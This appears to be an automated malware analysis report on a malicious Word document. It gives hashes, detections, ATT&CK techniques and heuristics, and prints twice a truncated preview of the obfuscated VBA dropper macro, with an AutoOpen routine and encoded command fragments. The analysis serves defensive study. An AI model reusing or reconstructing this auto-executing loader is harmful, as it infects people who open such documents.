Office (OLE) malware analysis — malicious · 1982ddb55fa50ff3

MALICIOUS

Office (OLE)

175.5 KB Created: 2018-05-18 07:36:00 Authoring application: Microsoft Office Word First seen: 2018-06-19

MD5: 3770b2bf0f5d19773929c8d87de760e7 SHA-1: 5388afd4e5596eff65061cff6ffa6387e25a4818 SHA-256: 1982ddb55fa50ff35eb67c5bc9fb101b6b755ffae8046c6c5a8cb9fa66b22662

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The 'OLE_VBA_SHELL' heuristic indicates the presence of a Shell() call, which is commonly used to execute arbitrary code. The 'Autoopen' macro suggests it runs automatically upon opening. This points to a macro-based downloader, a common initial access vector via spearphishing attachments.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6548036-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6548036-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 177069 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	177069 bytes
SHA-256: `360397ed8e5e6270af2c8299f8a4e24615b9ce10440a50e55b0a528f07604bb1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YcKPrfKnjSjcuA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub HjCpGw(OIPJzo) For witBwh = 28830 To 70407 For jXdjUj = 93894 To TuakB zUBtrE = ChrB(GNjVi) Next LcREfW = 11636 * 35795 dPGiL = qFNKzB + juoXfV Next End Sub Sub JuKqjl(BpvOvO) For rlmJtO = 30734 To 16563 For LjzPv = 43325 To HqkpJ FQBazo = ChrB(SwCmR) Next JBOmHN = 1482 * 47578 JjWwfY = XKZVIj + ISObs Next For PiLzG = 25985 To 29547 For DccIKF = 13370 To EAJqi rNvjc = ChrB(GUtlHV) Next iXYsRJ = 88580 * 38357 wNwaPp = NRCYq + wBZlkn Next For jqAoWc = 89222 To 60662 For rhkEJ = 31143 To iBPQFf FzsrZ = ChrB(TjYGk) Next GMJEnv = 67468 * 10370 UomdiS = jVXiDW + rdkVIo Next End Sub Sub IiUKK(ZwbUW) For tlIGNr = 7459 To 55196 For DiFujR = 34074 To CaaQOM SSYwR = ChrB(tDHddJ) Next WXdEMO = 10465 * 90831 QaEHU = uvJiZ + ouTHLJ Next For fzQFI = 67378 To 9960 For wVEAGO = 7633 To zsJSU LUwkj = ChrB(cKzAFw) Next QzUwY = 29979 * 87853 aFiSjk = VOBqoW + wHXzWD Next End Sub Sub Autoopen() On Error Resume Next For XDuKzn = 4819 To 54766 For kCbLlO = 38972 To zwjpj OHsiDN = ChrB(ZsqLC) Next jIkwp = 87020 * 34963 nNLAh = FzYTwo + fCGIz Next DEVMaPww (XLKkz + wSOmNvlcJ + NkJPBt) For Rhbuhi = 40791 To 50726 For aUXPO = 93540 To Fdnqi FdcLRU = ChrB(vkWZA) Next XEHZi = 57901 * 78132 lpNkU = hElND + WbzSW Next End Sub Sub AXXqw(OqZwwE) For MppUo = 29895 To 50768 For EVrwIV = 67509 To vHpDR QhvrOW = ChrB(riGjEq) Next hHJCvQ = 91792 * 5186 rpcfpd = IBriYH + zADSN Next For lRDiHT = 76736 To 95534 For HBiNBD = 2736 To roNqzf IDZiM = ChrB(rziPv) Next mzYWp = 88691 * 42383 qALGVv = MdAwn + qWEuFl Next For PDzwGd = 29633 To 77289 For SXwbl = 44537 To sSMQm UiSHnv = ChrB(UckIlf) Next AMArja = 86972 * 22492 AMBTPM = sUwjjR + wqTNzq Next End Sub Sub nqFkGf(VkLmI) For SvmcL = 15466 To 1761 For onvDjh = 2605 To MNuVp VviIj = ChrB(Xkmzb) Next MDErB = 82950 * 79049 zDKhXw = UXwsm + FZqtD Next End Sub Attribute VB_Name = "sUDAzcXUzwU" Sub CjuNS(BkirCM) For FovHdN = 96165 To 95850 For wavCM = 9795 To dTXDmp WsHFs = ChrB(sASrM) Next ncNUjW = 27826 * 75217 TRPYwl = XfJBP + ZOWHFf Next End Sub Function wSOmNvlcJ() On Error Resume Next For vIEpT = 33266 To 44912 For zojXC = 43001 To arhvh cniLcF = ChrB(wzbQj) Next nLNaE = 59847 * 26764 YrdiNL = ofZKw + SVViqL Next For HabIto = 22587 To 10192 For VsdMFI = 49816 To UKkNj zjZGL = ChrB(vcwwB) Next jjAcaK = 60980 * 42416 mwBLq = nNwjPa + dZTiA Next TznmHKPbLv = ujOXQ("dQW+'.)8ec}8ec+8ec}{h'+'c8ec+8ectac8ec+8ec};8ec+8eckaerb;8ec+8ec)CDSb8ec+8ec'+'cq()'+'QuAmetI8ec+8ec-eQ8ec+8ecuA+QuAkQuA+Qu'+'AovnIQu8ec+8ecA(8ec+8ec&8ec+8ec;)CDSbcq8ec+8ec ,)(8ec+8ecqAT8ec+8ecg8ec+B,,T", 8674 + 5 - 8674, 8674 + 195 - 8674) For sttjKX = 53838 To 81558 For skahK = 61945 To mYuUi PAQmH = ChrB(FbIrJ) Next ditQqn = 28109 * 71219 UNGiPq = mvnfV + isQYQS Next For KTUXJ = 57089 To 71098 For zXEhh = 32125 To szzvCL iDptm = ChrB(twvPkm) Next lmzQW = 24315 * 35591 ShJGl = iRmOp + vpQhP Next pjQoWwslDR = ujOXQ("ffC8ecN68ec+8eciyi6iy8ec+8ecrtS8ec+8ecoTqA8ec+8ecT.cfsabc8ec+8ec'+'bRGh", 70229 + 5 - 70229, 70229 + 64 - 70229) For ziAbpz = 90357 To 83381 For FAhYq = 87105 To MVjnBR hJAua = ChrB(wWPAfN) Next VqsLLt = 18831 * 48285 FqzSE = uBco ... (truncated)

SHA-256: 360397ed8e5e6270af2c8299f8a4e24615b9ce10440a50e55b0a528f07604bb1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "YcKPrfKnjSjcuA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub HjCpGw(OIPJzo)
For witBwh = 28830 To 70407
      For jXdjUj = 93894 To TuakB
         zUBtrE = ChrB(GNjVi)
      Next
      LcREfW = 11636 * 35795
      dPGiL = qFNKzB + juoXfV
Next
End Sub
Sub JuKqjl(BpvOvO)
For rlmJtO = 30734 To 16563
      For LjzPv = 43325 To HqkpJ
         FQBazo = ChrB(SwCmR)
      Next
      JBOmHN = 1482 * 47578
      JjWwfY = XKZVIj + ISObs
Next
For PiLzG = 25985 To 29547
      For DccIKF = 13370 To EAJqi
         rNvjc = ChrB(GUtlHV)
      Next
      iXYsRJ = 88580 * 38357
      wNwaPp = NRCYq + wBZlkn
Next
For jqAoWc = 89222 To 60662
      For rhkEJ = 31143 To iBPQFf
         FzsrZ = ChrB(TjYGk)
      Next
      GMJEnv = 67468 * 10370
      UomdiS = jVXiDW + rdkVIo
Next
End Sub
Sub IiUKK(ZwbUW)
For tlIGNr = 7459 To 55196
      For DiFujR = 34074 To CaaQOM
         SSYwR = ChrB(tDHddJ)
      Next
      WXdEMO = 10465 * 90831
      QaEHU = uvJiZ + ouTHLJ
Next
For fzQFI = 67378 To 9960
      For wVEAGO = 7633 To zsJSU
         LUwkj = ChrB(cKzAFw)
      Next
      QzUwY = 29979 * 87853
      aFiSjk = VOBqoW + wHXzWD
Next
End Sub
Sub Autoopen()
On Error Resume Next
For XDuKzn = 4819 To 54766
      For kCbLlO = 38972 To zwjpj
         OHsiDN = ChrB(ZsqLC)
      Next
      jIkwp = 87020 * 34963
      nNLAh = FzYTwo + fCGIz
Next
DEVMaPww (XLKkz + wSOmNvlcJ + NkJPBt)
For Rhbuhi = 40791 To 50726
      For aUXPO = 93540 To Fdnqi
         FdcLRU = ChrB(vkWZA)
      Next
      XEHZi = 57901 * 78132
      lpNkU = hElND + WbzSW
Next
End Sub
Sub AXXqw(OqZwwE)
For MppUo = 29895 To 50768
      For EVrwIV = 67509 To vHpDR
         QhvrOW = ChrB(riGjEq)
      Next
      hHJCvQ = 91792 * 5186
      rpcfpd = IBriYH + zADSN
Next
For lRDiHT = 76736 To 95534
      For HBiNBD = 2736 To roNqzf
         IDZiM = ChrB(rziPv)
      Next
      mzYWp = 88691 * 42383
      qALGVv = MdAwn + qWEuFl
Next
For PDzwGd = 29633 To 77289
      For SXwbl = 44537 To sSMQm
         UiSHnv = ChrB(UckIlf)
      Next
      AMArja = 86972 * 22492
      AMBTPM = sUwjjR + wqTNzq
Next
End Sub
Sub nqFkGf(VkLmI)
For SvmcL = 15466 To 1761
      For onvDjh = 2605 To MNuVp
         VviIj = ChrB(Xkmzb)
      Next
      MDErB = 82950 * 79049
      zDKhXw = UXwsm + FZqtD
Next
End Sub

Attribute VB_Name = "sUDAzcXUzwU"
Sub CjuNS(BkirCM)
For FovHdN = 96165 To 95850
      For wavCM = 9795 To dTXDmp
         WsHFs = ChrB(sASrM)
      Next
      ncNUjW = 27826 * 75217
      TRPYwl = XfJBP + ZOWHFf
Next
End Sub
Function wSOmNvlcJ()
On Error Resume Next
For vIEpT = 33266 To 44912
      For zojXC = 43001 To arhvh
         cniLcF = ChrB(wzbQj)
      Next
      nLNaE = 59847 * 26764
      YrdiNL = ofZKw + SVViqL
Next
For HabIto = 22587 To 10192
      For VsdMFI = 49816 To UKkNj
         zjZGL = ChrB(vcwwB)
      Next
      jjAcaK = 60980 * 42416
      mwBLq = nNwjPa + dZTiA
Next
TznmHKPbLv = ujOXQ("dQW+'.)8ec}8ec+8ec}{h'+'c8ec+8ectac8ec+8ec};8ec+8eckaerb;8ec+8ec)CDSb8ec+8ec'+'cq()'+'QuAmetI8ec+8ec-eQ8ec+8ecuA+QuAkQuA+Qu'+'AovnIQu8ec+8ecA(8ec+8ec&8ec+8ec;)CDSbcq8ec+8ec ,)(8ec+8ecqAT8ec+8ecg8ec+B,,T", 8674 + 5 - 8674, 8674 + 195 - 8674)
For sttjKX = 53838 To 81558
      For skahK = 61945 To mYuUi
         PAQmH = ChrB(FbIrJ)
      Next
      ditQqn = 28109 * 71219
      UNGiPq = mvnfV + isQYQS
Next
For KTUXJ = 57089 To 71098
      For zXEhh = 32125 To szzvCL
         iDptm = ChrB(twvPkm)
      Next
      lmzQW = 24315 * 35591
      ShJGl = iRmOp + vpQhP
Next
pjQoWwslDR = ujOXQ("ffC8ecN68ec+8eciyi6iy8ec+8ecrtS8ec+8ecoTqA8ec+8ecT.cfsabc8ec+8ec'+'bRGh", 70229 + 5 - 70229, 70229 + 64 - 70229)
For ziAbpz = 90357 To 83381
      For FAhYq = 87105 To MVjnBR
         hJAua = ChrB(wWPAfN)
      Next
      VqsLLt = 18831 * 48285
      FqzSE = uBco
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.